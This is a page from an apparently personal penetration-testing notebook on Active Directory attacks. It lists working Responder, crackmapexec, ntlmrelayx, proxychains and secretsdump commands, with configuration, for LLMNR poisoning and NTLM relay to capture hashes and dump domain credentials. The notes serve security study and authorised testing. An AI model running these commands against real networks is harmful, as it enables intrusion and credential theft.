Hacking Notes
  • What is this?
  • Reconnaissance 🗣
    • Information Gathering 🗣
  • Enumeration 🎯
    • Host Discovery 🛎
    • DNS Enumeration
    • OS Discovery 🖥
    • Port Scanning 📟
    • WAF Evasion
  • Web 📱
    • Unrestricted File Upload
    • Templates Injections ✖️
    • File Inclusion
    • Login Panes
    • SQL Injection
    • NoSQL Injection
    • OAuth 2.0 Bypass
  • Privilege Escalation
    • Linux Privesc
    • Windows Privesc
    • Run Commands AS
  • Post Explotation 💀
    • Port Forwarding and Tunneling
    • Transfering Files 📤
    • Reverse Shell 🔙
    • Crypto 101 👁
    • AV Evasion
    • Bypass UAC
    • Get Credentials
  • Services
    • PORT 21/tcp - FTP
    • PORT 25/tcp - SMTP
    • PORT 53/tcp/udp - DNS
    • Port 80,443/tcp - HTTP
    • Port 111/tcp - RPCBind
    • PORT 143,993/tcp - IMAP
    • PORT 139,445/tcp - SMB
    • PORT 161/udp - SNMP
    • PORT 1100/tcp - Java RMI
    • PORT 1433/tcp - Microsoft SQL Server
    • PORT 2049/tcp - NFS
    • PORT 3306/tcp MySQL
    • PORT 3389/tcp RDP
    • PyPI Server
  • Software
    • Tomcat
    • Jenkins
    • Drupal
    • Wordpress
  • Client-Side Attacks
    • Evil PDF
    • Microsoft Office Macros
  • Other
    • Hacking WiFI
      • WPA/WPA2 PSK
      • WPA/WPA2 PEAP (Enterprise)
      • WEP
    • Hacking with Powershell
    • Hacking AWS
  • Exploiting
    • Buffer Overflow
  • Active Directory
    • 🖥️AD Attacks
Powered by GitBook
Page cover
On this page
  1. Active Directory

🖥️AD Attacks

PreviousBuffer Overflow

Last updated 3 years ago

Was this helpful?

CtrlK
  • Without Credentials
  • LLMNR / NetBIOS Poisoning
  • NTLM Relay (SMB signing disabled)

Was this helpful?

Without Credentials

LLMNR / NetBIOS Poisoning

We can grab some hashed credentials if LLMNR protocol is enabled.

sudo responder -I eth0 -Fw

After some time we can get all the hashes.

cd /usr/share/responder
sudo python DumpHash.py

NTLM Relay (SMB signing disabled)

Some tiems some server are misconfigured and have the smb signing disabled, so we can perform more attacks with responder.

Configuration

  • /etc/proxychains4.conf

socks4  127.0.0.1       1080
  • /usr/share/responder/Responder.conf

[Responder Core]

; Servers to start
SMB = Off
HTTP = On

Perform the attack

We need to get a list of the servers with the SMB sigining disabled.

crackmapexec smb --gen-relay-list vulnerable_servers.txt 10.10.10.0/24

Execute the attack with Responder and Impacket.

impacket-ntlmrelayx.py -tf ./vulnerable_servers.txt -socks -smb2support
sudo responder -I eth0

We can list the current sessions with the next command.

ntlmrelayx> socks

When a session with administrative privileges is found we can use secretsdump or other tool with proxychains to use the session captured.

proxychains impacket-secretdump DOMAIN/admin@IP